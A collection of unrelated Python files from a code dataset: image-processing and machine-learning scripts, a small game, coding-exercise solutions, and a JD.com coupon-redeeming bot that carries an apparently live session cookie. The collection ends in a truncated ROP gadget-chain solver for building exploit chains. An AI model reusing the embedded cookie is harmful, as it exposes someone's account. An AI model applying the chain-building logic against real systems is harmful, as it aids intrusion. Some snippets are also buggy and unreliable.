SkinTrimUtilsTestByStep.COLOR_SPACE_HSV)\n putTextTo(hsv, \"hsv\")\n rgb = SkinTrimUtilsTestByStep.getColorSpaceMask(frame, SkinTrimUtilsTestByStep.COLOR_SPACE_RGB)\n putTextTo(rgb, \"rgb\")\n lab = SkinTrimUtilsTestByStep.getColorSpaceMask(frame, SkinTrimUtilsTestByStep.COLOR_SPACE_Lab)\n putTextTo(lab, \"lab\")\n ycrcb = SkinTrimUtilsTestByStep.getColorSpaceMask(frame, SkinTrimUtilsTestByStep.COLOR_SPACE_YCrCb)\n putTextTo(ycrcb, \"ycrcb\")\n # mask = np.hstack([melt, hsv, rgb, lab, ycrcb])\n mask = np.concatenate((melt, hsv, rgb, lab, ycrcb), axis=1)\n\n cv2.imshow(title, mask)\n\n\nvideoCapture = cv2.VideoCapture(1)\n\n\ndef testImage():\n showImage(cv2.imread(\"../../faces/7.jpeg\"), \"1\")\n showImage(cv2.imread(\"../../faces/white.jpg\"), \"2\")\n showImage(cv2.imread(\"../../faces/deepdark.jpg\"), \"3\")\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\ndef testVideo():\n while videoCapture.isOpened():\n ret, frame = videoCapture.read()\n if not ret:\n print(\"摄像头有问题!\")\n showImage(frame, \"1\")\n\n # Hit 'q' on the keyboard to quit!\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n videoCapture.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n # testVideo()\n testImage()\n","sub_path":"test/skin_test/SkinTrimTestByStepRealTime.py","file_name":"SkinTrimTestByStepRealTime.py","file_ext":"py","file_size_in_byte":8835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"307397283","text":"#!/usr/bin/env python3\n##########################################################################################\n# Author: Jared L. Ostmeyer\n# Date Started: 2019-01-28\n# Purpose: Train and validate model classifier for T-cell receptor sequences\n##########################################################################################\n\n##########################################################################################\n# Libraries\n##########################################################################################\n\nimport argparse\nimport os\nfrom dataset import *\nfrom model import *\nimport tensorflow as tf\nimport numpy as np\n\n##########################################################################################\n# Arguments\n##########################################################################################\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--database', help='Path to the database', type=str, required=True)\nparser.add_argument('--cohort_train', help='Name of the training cohort', type=str, required=True)\nparser.add_argument('--split_train', help='Name of the training samples', type=str, required=True)\nparser.add_argument('--cohort_val', help='Name of the validation cohort', type=str, required=True)\nparser.add_argument('--split_val', help='Name of the validation samples', type=str, required=True)\nparser.add_argument('--output', help='Output basename', type=str, required=True)\nparser.add_argument('--path_shuffle_train', help='Path where CSV file will store shuffled data', type=str, default=None)\nparser.add_argument('--path_shuffle_val', help='Path where CSV file will store shuffled data', type=str, default=None)\n\nparser.add_argument('--gpu', help='GPU ID', type=int, default=0)\n\nargs = parser.parse_args()\n\n##########################################################################################\n# Environment\n##########################################################################################\n\nos.environ['CUDA_VISIBLE_DEVICES'] = str(args.gpu)\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\n##########################################################################################\n# Load datasets\n##########################################################################################\n\n# Settings\n#\nmax_steps = 32\n\n# Load representation of the features\n#\naminoacids_dict = load_aminoacid_embedding_dict('../lib/atchley_factors_normalized.csv')\n\n# Load the samples\n#\nxs_train, ys_train, ws_train = load_dataset(\n args.database, args.cohort_train, args.split_train, aminoacids_dict, path_shuffle=args.path_shuffle_train\n)\nxs_val, ys_val, ws_val = load_dataset(\n args.database, args.cohort_val, args.split_val, aminoacids_dict, path_shuffle=args.path_shuffle_val\n)\n\n##########################################################################################\n# Model\n##########################################################################################\n\n# Settings\n#\nlearning_rate = 0.001\nfilter_size = 8\nnum_levels = 3\nnum_fits = 16\n\nfirst = list(ys_train.keys())[0]\n\n# Inputs\n#\nfeatures_cdr3_block = tf.placeholder(tf.float32, [None]+list(xs_train[first]['cdr3'].shape[1:]))\nfeatures_quantity_block = tf.placeholder(tf.float32, [None])\nfeatures_age_block = tf.placeholder(tf.float32)\nweight_block = tf.placeholder(tf.float32)\nlabel_block = tf.placeholder(tf.float32)\nlevel_block = tf.placeholder(tf.int32)\n\n# Format inputs\n#\nfeatures_quantity_block_ = features_quantity_block/tf.reduce_sum(features_quantity_block)\nfeatures_age_block_ = tf.reshape(features_age_block, [1])\nlabels_block = tf.tile(\n tf.reshape(label_block, [1]),\n [ num_fits ]\n)\nweight_block_ = tf.reshape(weight_block, [1])\n\n# Define the model\n#\nmodel = generate_model(xs_train[first]['cdr3'].shape[1:], num_fits, filter_size)\n\n# Run model\n#\nlogits_block = model(\n [\n features_cdr3_block, features_quantity_block_, features_age_block_,\n weight_block_, level_block\n ]\n)\n\nprobabilities_block = tf.math.sigmoid(logits_block)\n\n# Metrics\n#\nerror_block = tf.nn.sigmoid_cross_entropy_with_logits(logits=logits_block, labels=labels_block)\ncosts_block = weight_block_*error_block\n\ncorrects_block = tf.cast(\n tf.equal(\n tf.round(labels_block),\n tf.round(probabilities_block)\n ),\n logits_block.dtype\n)\naccuracies_block = weight_block_*corrects_block\n\n# Aggregate metrics\n#\ncosts = tf.get_variable(\n 'costs', shape=costs_block.get_shape(),\n initializer=tf.constant_initializer(0.0),\n dtype=costs_block.dtype, trainable=False\n)\naccuracies = tf.get_variable(\n 'accuracies', shape=accuracies_block.get_shape(),\n initializer=tf.constant_initializer(0.0),\n dtype=accuracies_block.dtype, trainable=False\n)\n\naccumulate_costs = costs.assign_add(costs_block)\naccumulate_accuracies = accuracies.assign_add(accuracies_block)\n\nreset_costs = costs.assign(tf.zeros_like(costs))\nreset_accuracies = accuracies.assign(tf.zeros_like(accuracies))\n\nindex_bestfit = tf.argmin(costs, axis=0)\n\n# Aggregate gradients\n#\noptimizer = tf.train.AdamOptimizer(learning_rate)\ngrads_params_sample = optimizer.compute_gradients(tf.reduce_sum(costs_block), var_list=tf.trainable_variables())\n\ngrads = [\n tf.Variable(tf.zeros_like(param.initialized_value()), dtype=param.initialized_value().dtype, trainable=False) \\\n for grad, param in grads_params_sample\n]\n\naccumulate_gradients = tf.group(*[\n grads[index].assign_add(grad) for index, (grad, param) in enumerate(grads_params_sample)\n])\nreset_gradients = tf.group(*[\n grad.assign(tf.zeros_like(grad)) for grad in grads\n])\n\napply_gradients = optimizer.apply_gradients([\n (grads[index], param) for index, (grad, param) in enumerate(grads_params_sample)\n])\n\n# Create operator to initialize session\n#\ninitializer = tf.global_variables_initializer()\n\n##########################################################################################\n# Session\n##########################################################################################\n\n# Settings\n#\nnum_epochs = 128\ncutoff = 131072\n\n# Open session\n#\nwith tf.Session() as session:\n\n # Initialize variables\n #\n session.run(initializer)\n\n # Initialize the model\n #\n for level_ in range(0, num_levels):\n for sample in ys_train.keys():\n session.run(\n probabilities_block,\n feed_dict={\n features_cdr3_block: xs_train[sample]['cdr3'][:cutoff],\n features_quantity_block: xs_train[sample]['quantity'][:cutoff],\n features_age_block: xs_train[sample]['age'],\n weight_block: ws_train[sample],\n level_block: level_\n }\n ) \n\n # Each iteration represents one batch\n #\n for epoch in range(0, num_epochs):\n\n # Train the model\n #\n session.run((reset_costs, reset_accuracies, reset_gradients))\n for sample in ys_train.keys():\n session.run(\n (accumulate_costs, accumulate_accuracies, accumulate_gradients),\n feed_dict={\n features_cdr3_block: xs_train[sample]['cdr3'][:cutoff],\n features_quantity_block: xs_train[sample]['quantity'][:cutoff],\n features_age_block: xs_train[sample]['age'],\n label_block: ys_train[sample],\n weight_block: ws_train[sample],\n level_block: num_levels\n }\n )\n cs_train, as_train, i_bestfit = session.run((costs, accuracies, index_bestfit))\n\n # Validate the model\n #\n session.run((reset_costs, reset_accuracies))\n for sample in ys_val.keys():\n session.run(\n (accumulate_costs, accumulate_accuracies),\n feed_dict={\n features_cdr3_block: xs_val[sample]['cdr3'][:cutoff],\n features_quantity_block: xs_val[sample]['quantity'][:cutoff],\n features_age_block: xs_val[sample]['age'],\n label_block: ys_val[sample],\n weight_block: ws_val[sample],\n level_block: num_levels\n }\n )\n cs_val, as_val = session.run((costs, accuracies))\n\n # Update the parameters\n #\n session.run(apply_gradients)\n\n # Print report\n #\n print(\n epoch,\n np.mean(cs_train)/np.log(2.0),\n 100.0*np.mean(as_train),\n np.mean(cs_val)/np.log(2.0),\n 100.0*np.mean(as_val),\n i_bestfit,\n cs_train[i_bestfit]/np.log(2.0),\n 100.0*as_train[i_bestfit],\n cs_val[i_bestfit]/np.log(2.0),\n 100.0*as_val[i_bestfit],\n sep='\\t', flush=True\n )\n\n # Save the predictions on training data\n #\n with open(args.output+'_ps_train.csv', 'w') as stream:\n print('Sample', 'Weight', 'Label', ','.join([ 'Prediction_'+str(i) for i in range(num_fits) ]), sep=',', file=stream)\n for sample, y in ys_train.items():\n ps = session.run(\n probabilities_block,\n feed_dict={\n features_cdr3_block: xs_train[sample]['cdr3'][:cutoff],\n features_quantity_block: xs_train[sample]['quantity'][:cutoff],\n features_age_block: xs_train[sample]['age'],\n weight_block: ws_train[sample],\n level_block: num_levels\n }\n )\n print(sample, ws_train[sample], y, ','.join([ str(ps[i]) for i in range(num_fits) ]), sep=',', file=stream)\n\n # Save the predictions on validation data\n #\n with open(args.output+'_ps_val.csv', 'w') as stream:\n print('Sample', 'Weight', 'Label', ','.join([ 'Prediction_'+str(i) for i in range(num_fits) ]), sep=',', file=stream)\n for sample, y in ys_val.items():\n ps = session.run(\n probabilities_block,\n feed_dict={\n features_cdr3_block: xs_val[sample]['cdr3'][:cutoff],\n features_quantity_block: xs_val[sample]['quantity'][:cutoff],\n features_age_block: xs_val[sample]['age'],\n weight_block: ws_val[sample],\n level_block: num_levels\n }\n )\n print(sample, ws_val[sample], y, ','.join([ str(ps[i]) for i in range(num_fits) ]), sep=',', file=stream)\n\n # Save the parameters\n #\n model.save_weights(args.output)\n\n","sub_path":"repertoire-classification-problem/model/comparisons/dkm-2sequences-8steps/train_val.py","file_name":"train_val.py","file_ext":"py","file_size_in_byte":9820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"62931519","text":"from tkinter import *\nimport random\nclass Pokemon:\n health = 100\n\n def __init__(self,_name,_type,_moves,_speed):\n self.name=_name\n self.type=_type\n self.moves=_moves\n self.speed=_speed\n def damage(self,amount):\n if amount > self.health:\n self.health = 0\n else:\n self.health -= amount\npikachuMoves = ('Thunder','Quick Attack','Slam','Lightning')\ngoldeenMoves = ('Bubblebeam','Tackle','Slam','Surf')\nmoveInfo = [('Thunder','Electric',30,75),\n ('Quick Attack', 'Normal', 10, 100),\n ('Slam','Normal',70,50),\n ('Lightning', 'Electric',60,60),\n ('Bubblebeam','Water',60,60),\n ('Tackle','Normal',25,75),\n ('Surf','Water',20,90)]\nplayer = Pokemon('Pikachu','Electric',pikachuMoves,50)\ncomputer = Pokemon('Goldeen','Water',goldeenMoves,20)\ndef getmoveinfo(movename):\n for move in moveInfo:\n if movename == move[0]:\n return move\ndef printMoves(movesarray):\n for i in range(4):\n info = getmoveinfo(movesarray[i])\n string = 'Move #' + str(i+1) + ') '\n string += 'Name: ' + info[0] + ', '\n string += 'Type: ' + str(info[1]) + ', '\n string += 'Damage: ' + str(info[2]) + ', '\n string += 'Accuracy: ' + str(info[3])\n print(string)\ndef effectiveness(aType,dType):\n if aType == 'Electric' and dType == 'Water': \n return 2.0\n if aType == 'Water' and dType == 'Electric':\n return 0.5\n return 1.0\ndef attack(a,d,mi):\n print(a.name,'uses',mi[0])\n multiplier = effectiveness(mi[1],d.type)\n totaldamage = int(multiplier*mi[2])\n randomNum = random.randint(1,100)\n if mi[3] >= randomNum:\n print(a.name, 'has hit', d.name, 'with', mi[0])\n print(d.name,'is dealt', totaldamage,'damage')\n d.damage(totaldamage)\n else:\n print(mi[0] + ' missed!')\nprint('Welcome to Pokemon Arena')\nprint('Your Pokemon is',player.name)\nprint('Your opponent\\'s Pokemon is', computer.name)\nprint(player.name, 'has the following moves:')\nprintMoves(player.moves)\nprint(computer.name, 'has the following moves:')\nprintMoves(computer.moves) \nwhile(player.health != 0 and computer.health != 0):\n num1 = input('Please select a move by typing 1,2,3,4: ')\n num = int(num1)\n usermove = player.moves[num-1] #move 1 is moves 0\n moveinfo = getmoveinfo(usermove)\n compmove = random.choice(computer.moves)\n compmoveinfo = getmoveinfo(compmove)\n if player.speed > computer.speed:\n if computer.health > 0:\n attack(computer,player,compmoveinfo)\n else:\n attack(computer,player,compmoveinfo)\n if player.health > 0:\n attack(player,computer,compmoveinfo)\n print(player.name, 'has a remaining health of', player.health)\n print(computer.name, 'has a remaining health of', computer.health)\n if player.health == 0:\n print(player.name,\"fainted, you lose!\")\n if computer.health == 0:\n print(computer.name,'fainted, you win!')\n \n\n","sub_path":"Python - Advanced/Youwen - Lesson 9.py","file_name":"Youwen - Lesson 9.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"429811631","text":"\"\"\"\r\n# Definition for Employee.\r\nclass Employee:\r\n def __init__(self, id: int, importance: int, subordinates: List[int]):\r\n self.id = id\r\n self.importance = importance\r\n self.subordinates = subordinates\r\n\"\"\"\r\nfrom collections import deque\r\nclass Solution:\r\n \"\"\"DFS Implementation\r\n Time complexity-O(n)\r\n Space Complexity-O(n)\"\"\"\r\n def __init__(self):\r\n self.result=0\r\n self.mapfunc={}\r\n def getImportance(self, employees: List['Employee'], id: int) -> int:\r\n if not employees:\r\n return 0\r\n for i in employees:\r\n self.mapfunc[i.id]=i\r\n self.dfs(id)\r\n return self.result\r\n \r\n def dfs(self, i):\r\n if not i in self.mapfunc:\r\n return 0\r\n self.result+=self.mapfunc[i].importance\r\n children=self.mapfunc[i].subordinates\r\n if children:\r\n for j in children:\r\n self.dfs(j)\r\n \r\n \r\n \"\"\"BFS Implementation\r\n Time complexity-O(n)i.e. V+E\r\n Space Complexity-O(n)\"\"\"\r\n # def getImportance(self, employees: List['Employee'], id: int) -> int:\r\n # result=0\r\n # q=deque()\r\n # mapfunc={}\r\n # for i in employees:\r\n # mapfunc[i.id]=i\r\n # for i in mapfunc:\r\n # if i==id:\r\n # q.append(i)\r\n # while q:\r\n # size=len(q)\r\n # for i in range(size):\r\n # curr=q.popleft()\r\n # result+=mapfunc[curr].importance\r\n # children=mapfunc[curr].subordinates\r\n # if children:\r\n # for j in children:\r\n # q.append(j)\r\n # return result\r\n \r\n \r\n ","sub_path":"Employee_Importance.py","file_name":"Employee_Importance.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"558539332","text":"class Solution:\n def licenseKeyFormatting(self, S, K):\n \"\"\"\n :type S: str\n :type K: int\n :rtype: str\n \"\"\"\n S = list(S)\n i = 0\n len_chars = 0\n while i < len(S):\n if S[i] != \"-\":\n len_chars += 1\n i += 1\n\n mod_val = len_chars % K\n num_dashes_needed = len_chars // K\n tot_str_len = len_chars + num_dashes_needed + mod_val\n while len(S) < tot_str_len:\n S.append(\"-\")\n\n return \"\".join(S)\nsol = Solution()\nprint(sol.licenseKeyFormatting(\"abcd\", 1))","sub_path":"python/482. License Key Formatting.py","file_name":"482. License Key Formatting.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"378007083","text":"import requests\nimport time\nimport datetime\nimport sys\nimport json\nfrom datetime import datetime\n\ndef exchange():\n t = time.time()\n microsecond = int(round(t * 1000))\n # activeDate = time.strftime(\"%Y%#m%d\", time.localtime())\n\n now = datetime.now()\n year = str(int(now.strftime('%Y')))\n month = str(int(now.strftime('%m')))\n day = str(now.strftime('%d'))\n activeDate = year + '' + month + '' + day\n\n \"\"\"\n 替换\n \"\"\"\n headers = {\n 'authority': 'wq.jd.com',\n 'user-agent': 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Mobile Safari/537.36',\n 'accept': '*/*',\n 'sec-fetch-site': 'same-site',\n 'sec-fetch-mode': 'no-cors',\n 'sec-fetch-dest': 'script',\n 'referer': 'https://wqs.jd.com/pglive/task/index.html?sceneval=2',\n 'accept-language': 'zh-CN,zh;q=0.9',\n 'cookie': 'wxa_level=1; webp=1; block_call_jdapp=11; sc_width=1920; __jdv=122270672%7Cbaidu%7C-%7Corganic%7Cnot%20set%7C1587518294267; wq_area=19_1607_4773%7C3; visitkey=28627513144879948; shshshfpa=f332fdcd-560b-5bf8-3c9c-9677b27ae4dc-1587518295; shshshfpb=cGa6CPa3nfOg4kZFPlxG7dg%3D%3D; retina=1; TrackerID=MRD4qz0xN_u4iyYh57criOB8RYViUMbilLbqHS-4SuSuZZt_Kgfbt2xCFiPLQs166V_pjsOIH-T9I59R8GM31wbjswcGtoPWdaXPtZ6T_0cTKfT73tYYU2gwVa3FpIHcHQ0Y44b-riLPOEypZgtgrw; pt_key=AAJen56gADB36nGmzYAiSsxxG7Sr8eynyZLVnz4lvzMMHGrhaaUQ-MW4YaHzpM1jVBoHaTAWmGU; pt_pin=jd_RmVTvMkeKfWf; pt_token=oycwt392; pwdt_id=jd_RmVTvMkeKfWf; cid=9; shshshfp=d54b79c8c57595c77d64b2e240e58999; PPRD_P=CT.138631.36.18; wqmnx1=MDEyNjM4Ni8uaS90ZTIxOC9ucjs1TUFLM0xHaC4xbGkxc2Y0MkVIJlI%3D; __wga=1587519170074.1587518294262.1587518294262.1587518294262.6.1; shshshsID=d95841118172c6fbf1f8021ff08af228_8_1587519170368; promotejs=ca244ad51eb358e5fc19cf82b02e233218WQ',\n }\n\n params = (\n ('active', 'zhiboduihuanhb' + activeDate),\n ('level', '1'), # 1 20元红包、2 10元红包、3 5元红包、4 2元红包、5 1元红包\n ('platform', '4'),\n ('_', microsecond),\n ('sceneval', '2'),\n ('g_login_type', '1'),\n ('callback', 'jsonpCBKL'),\n ('g_ty', 'ls'),\n )\n \n response = requests.get('https://wq.jd.com/jxlivetask/DrawAward', headers=headers, params=params)\n localtime = time.asctime( time.localtime(time.time()) )\n\n # 根据返回结果处理\n resultText = response.text.replace('jsonpCBKL(', '')\n resultText = resultText.replace(')', '')\n resultText = resultText.replace(';', '')\n resultTextJson = json.loads(resultText)\n if resultTextJson['msg'] == 'success':\n print(localtime, '兑换成功!')\n exit()\n\n print(localtime, '兑换结果:', response.text)\n\ndef cycle():\n \"\"\"\n 循环调用\n 如果当前时间大于整点+30秒的时候 continue\n \"\"\"\n while True:\n currentTimestamp = int(time.time())\n hourTimestampFormat = time.strftime(\"%Y-%m-%d 00:00:00\", time.localtime())\n hourTimestampArray = time.strptime(hourTimestampFormat, \"%Y-%m-%d %H:%M:%S\")\n hourTimestamp = int(time.mktime(hourTimestampArray))\n hourTimestampPlus30 = int(time.mktime(hourTimestampArray) + 30)\n\n # 开始时间点\n startLoopPoint = time.strftime(\"%Y-%m-%d 23:59:55\", time.localtime())\n startLoopPointArray = time.strptime(startLoopPoint, \"%Y-%m-%d %H:%M:%S\")\n startLoopPointTimestamp = int(time.mktime(startLoopPointArray))\n # print(startLoopPointTimestamp)\n # 当前时间在 T 23:59:55 --- T+1 00:00:30 之间\n if (currentTimestamp > startLoopPointTimestamp and currentTimestamp <= (startLoopPointTimestamp + 5)) or (currentTimestamp >= hourTimestamp and currentTimestamp < hourTimestampPlus30):\n exchange()\n time.sleep(1)\n\ndef main():\n # 调用\n cycle()\n \nif __name__ == \"__main__\":\n main()\n#NB. Original query string below. It seems impossible to parse and\n#reproduce query strings 100% accurately so the one below is given\n#in case the reproduced version is not \"correct\".\n# response = requests.get('https://wq.jd.com/jxlivetask/DrawAward?active=zhiboduihuanhb2020412&level=1&platform=4&_=1586652179175&sceneval=2&g_login_type=1&callback=jsonpCBKM&g_ty=ls', headers=headers, cookies=cookies)\n","sub_path":"zhibo_coin_20_bro.py","file_name":"zhibo_coin_20_bro.py","file_ext":"py","file_size_in_byte":4307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"337114089","text":"#!\"C:/Program Files/Python37/python\"\nfrom matplotlib import pyplot\nfrom openpyxl import load_workbook\n\ndef getvalue(x):\n return x.value\n\nwb = load_workbook('data_analysis_lab.xlsx')\nws = wb['Data']\n\nex_Year = list(map(getvalue, ws['A'][1:]))\nex_Temp = list(map(getvalue, ws['B'][1:]))\nex_RelTemp = list(map(getvalue, ws['C'][1:]))\nex_Activity = list(map(getvalue, ws['D'][1:]))\n\npyplot.plot(ex_Year, ex_Temp)\npyplot.plot(ex_Year, ex_RelTemp)\npyplot.plot(ex_Year, ex_Activity)\n\npyplot.xlabel('Год')\npyplot.xlabel('Значение')\npyplot.legend(['Температура (C)', 'Относительная температура (C)', 'Солнечная активность'])\n\nprint('script started')\npyplot.show()\nprint('script finished')\n","sub_path":"Lab1.2/data_analysis.py","file_name":"data_analysis.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"285260522","text":"from djpcms.html.classes import button_holder, button\r\nform = 'uniForm'\r\ninline = 'inline'\r\ninlineLabels = 'inlineLabels'\r\ninlineLabels2 = 'inlineLabels fullwidth'\r\ninlineLabels3 = 'inlineLabels auto'\r\nblockLabels = 'blockLabels'\r\ninlineFormsets = 'blockLabels2'\r\nnolabel = 'nolabel'\r\nlegend = 'legend'\r\nctrlHolder = 'ctrlHolder'\r\ncontrol = 'control'\r\nrequired = 'required'\r\nlabel = 'label'\r\nui_input = 'ui-input'\r\nalign_right = 'align-right'\r\nalign_middle = 'align-middle'\r\nlayout_block = 'layout-element'\r\ndelete_row = 'delete-row'\r\nnumber_of_forms = 'number-of-forms'","sub_path":"djpcms/forms/layout/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"170926625","text":"# cook your dish here\n#code_uncode create room\n#asik 11-03-2021\na,b,c=map(int,input().strip().split())\nbox1=list(map(int,input().strip().split()))[:a]\nbox2=list(map(int,input().strip().split()))[:b]\n\nbox1=sorted(box1)\n\nbox2=sorted(box2)\n\nprothom=0\n\nditio=0\n\ngonona=0\n\nwhile(prothom Trying to move %s to %s\" % (src, dst))\n # Direct move\n for g in mov_gadget_dict['register_move']:\n if g.instructions[0].src == src and g.instructions[0].dst == dst:\n print(\"-> Register Move: %s to %s\" % (src, dst))\n print(g)\n if not search_regmov_conflict(payload_insn, g):\n return True\n\n # Chained move\n index = 0\n movchain = []\n for g in mov_gadget_dict['register_move']:\n if g.instructions[0].src == src:\n if not search_regmov_conflict(payload_insn, g):\n movchain.append(src)\n while movchain.count(src) < 2:\n for tmp in mov_gadget_dict['register_move']:\n if tmp.instructions[0].src == movchain[index]:\n if not search_regmov_conflict(payload_insn, tmp):\n movchain.append(tmp.instructions[0].dst)\n index += 1\n for m in movchain:\n print(m)\n\n return False\n\n\ndef is_supported(payload_insn):\n \"\"\" Check if a given payload instruction is supported \"\"\"\n if payload_insn.mnemonic in OPCODES.values():\n return True\n print(colored(\"Not supported\", \"red\"))\n return False\n\n\ndef check_gadget_validity(g, controlled_regs):\n \"\"\"\n Checks a set of rules on a given gadget, returns True if all are passed\n False otherwise.\n \"\"\"\n gadget_src = g.instructions[0].src\n gadget_dst = g.instructions[0].dst\n if gadget_src == 'esp' or\\\n gadget_dst == 'esp' or\\\n g.instructions[len(g.instructions)-1].label != 'ret;':\n return False\n for i in g.instructions[1:]:\n if i.mnemonic == 'CALL' or\\\n i.mnemonic == 'LEAVE' or\\\n i.mnemonic == 'MOV r/m32,r32' and i.dst == gadget_dst or\\\n i.dst == 'esp':\n return False\n return True\n\n\ndef search_regmov_conflict(payload_insn, target_gadget):\n \"\"\"\n Search for a conflicting register move between a given instruction and a\n target gadget.\n\n Args:\n payload_insn: payload instruction used to check for possible conflicts\n\n target_gadget: potential Gadget found in the binary\n\n Returns:\n True if a conflict has been found, False otherwise.\n \"\"\"\n if payload_insn.label.find('ptr') == -1:\n unavailable_regs = []\n else:\n unavailable_regs = [payload_insn.src, payload_insn.dst]\n\n if target_gadget.instructions[0].src == payload_insn.dst:\n unavailable_regs.append(target_gadget.instructions[0].dst)\n if payload_insn.dst in unavailable_regs:\n unavailable_regs.remove(payload_insn.dst)\n\n for i in target_gadget.instructions[1:]:\n if i.dst in unavailable_regs:\n print(\"Conflicting instructions during mov sequence\")\n print(colored(\"Conflict on: \" + i.dst, 'red'))\n print(target_gadget)\n return True\n\n return False\n\n\ndef map_possible_movements(move_type, gagdgets_lists):\n \"\"\"\n Each register is associated with 3 lists mapping the possible\n Register to register move:\n - direct: list for direct moves (ex: mov eax, ebx)\n - chained: list with chained moves 1...n\n (ex: mov ecx, eax is not available directly, instead we have a chain:\n mov edx, eax --> mov ecx, edx).\n \"\"\"\n move_mapping = {}\n for reg in reglist:\n move_mapping[reg] = {'direct': [], 'chained': [], 'missing': []}\n\n if move_type == 'register_move':\n for reg in move_mapping.keys():\n # Find the direct mov possibilites in the Reg-to-Reg gadget list.\n for g in gadgets_lists['register_move']:\n src = g.instructions[0].src\n dst = g.instructions[0].dst\n if src == reg and dst not in move_mapping[reg][\"direct\"]:\n move_mapping[reg][\"direct\"].append(dst)\n\n # Find the possible chains within the direct mov list (length 2).\n for g in gadgets_lists['register_move']:\n src = g.instructions[0].src\n dst = g.instructions[0].dst\n for m in move_mapping[reg][\"direct\"]:\n if src == m and \\\n dst not in move_mapping[reg][\"direct\"] and \\\n dst not in move_mapping[reg][\"chained\"]:\n move_mapping[reg][\"chained\"].append(dst)\n\n # Find the possible chains within the 2-chain mov list (length 3+).\n for g in gadgets_lists['register_move']:\n src = g.instructions[0].src\n dst = g.instructions[0].dst\n for m in move_mapping[reg][\"chained\"]:\n if src == m and \\\n dst not in move_mapping[reg][\"direct\"] and \\\n dst not in move_mapping[reg][\"chained\"]:\n move_mapping[reg][\"chained\"].append(dst)\n\n # Appends the missing destinations to the missing list.\n for k in move_mapping.keys():\n if k not in move_mapping[reg][\"direct\"] and \\\n k not in move_mapping[reg][\"chained\"]:\n move_mapping[reg][\"missing\"].append(k)\n else:\n for reg in move_mapping.keys():\n for g in gadgets_lists[move_type]:\n dst = g.instructions[0].dst\n src = g.instructions[0].src\n if src == reg and dst not in move_mapping[reg][\"direct\"]:\n move_mapping[reg][\"direct\"].append(dst)\n\n # Appends the missing destinations to the missing list.\n for k in move_mapping.keys():\n if k not in move_mapping[reg][\"direct\"]:\n move_mapping[reg][\"missing\"].append(k)\n\n return move_mapping\n\n\ndef is_movable(src, dst, payload_insn, regmove_glist, move_mapping,\n gadget_chain, visited=[]):\n \"\"\"\n Checks if a non conflicting (ie: w/o side effects) register move chain can\n be found to transfer a given src register to a target one. If so, the\n corresponding gadget(s) is(are) added to the gadget chain in parameters.\n\n Args:\n src: String representing the source register\n\n dst: String representing the target register\n\n payload_insn: target payload Instruction\n\n regmove_glist: List of register move gadgets\n\n move_mapping: Dict containing Lists of register movements in the\n current context (direct, chained or missing)\n\n Returns:\n True if a move chain is found, False otherwise\n \"\"\"\n if src not in ['eax', 'ebx', 'ecx', 'edx', 'ebp', 'esp', 'edi', 'esi']:\n debug(\"Constant\")\n for pg in pop_gadgets:\n debug(pg)\n if pg.instructions[0].dst == dst:\n gadget_chain.append(pg)\n return True\n return False\n\n if dst not in ['eax', 'ebx', 'ecx', 'edx', 'ebp', 'esp', 'edi', 'esi']:\n debug(\"Constant\")\n for pg in pop_gadgets:\n debug(pg)\n if pg.instructions[0].dst == src:\n gadget_chain.append(pg)\n return True\n return False\n\n debug(\"Visited regs: %s\" % colored(' '.join(str(r) for r in visited),\n 'cyan'))\n\n for reg in move_mapping[src]['direct']:\n if reg == dst and reg != src:\n for g in regmove_glist:\n if g.instructions[0].src == src and\\\n g.instructions[0].dst == reg:\n debug(\"Move %s to %s\" % (src, reg))\n debug(g)\n if not search_regmov_conflict(payload_insn, g):\n gadget_chain.append(g)\n return True\n\n for reg in move_mapping[src]['direct']:\n if reg not in visited and reg != src:\n visited.append(reg)\n debug(\"Move %s to %s\" % (src, reg))\n for g in regmove_glist:\n if g.instructions[0].src == src and\\\n g.instructions[0].dst == reg:\n if not search_regmov_conflict(payload_insn, g):\n debug(g)\n gadget_chain.append(g)\n return is_movable(reg, dst, payload_insn,\n regmove_glist, move_mapping,\n gadget_chain, visited)\n return False\n\n\ndef solve_chain(chain_type, payload_insn, mov_gadget_dict, move_mapping):\n \"\"\"\n Tries to find a side-effect free gadget chain that matches a given payload\n instruction.\n\n Args:\n chain_type: String representing the type of chain searched\n (register_move, memory_read, memory_write)\n\n payload_insn: target payload Instruction\n\n mov_gadget_dict: Dict containing Lists of all gadgets found for each\n each type of mov instructions.\n\n move_mapping: Dict containing Lists of register movements in the\n current context (direct, chained or missing)\n\n Returns:\n List of gadgets consituting the chain, None if none is found.\n \"\"\"\n\n gadget_chain = []\n\n if payload_insn.label.find('ptr') == -1:\n debug(\"Case 0: register move\")\n if is_movable(payload_insn.src, payload_insn.dst, payload_insn,\n mov_gadget_dict['register_move'], move_mapping,\n gadget_chain,\n visited=[]):\n debug(colored(\"✓ Chain found\", 'green'))\n return gadget_chain\n else:\n # Case 1\n for g in mov_gadget_dict[chain_type]:\n if g.instructions[0].dst == payload_insn.dst and \\\n g.instructions[0].src == payload_insn.src:\n gadget_chain.append(g)\n debug(\"Case 1: same src same dst\")\n debug(g)\n debug(colored(\"✓ Chain found\", 'green'))\n return gadget_chain\n # Case 2\n for g in mov_gadget_dict[chain_type]:\n if g.instructions[0].dst == 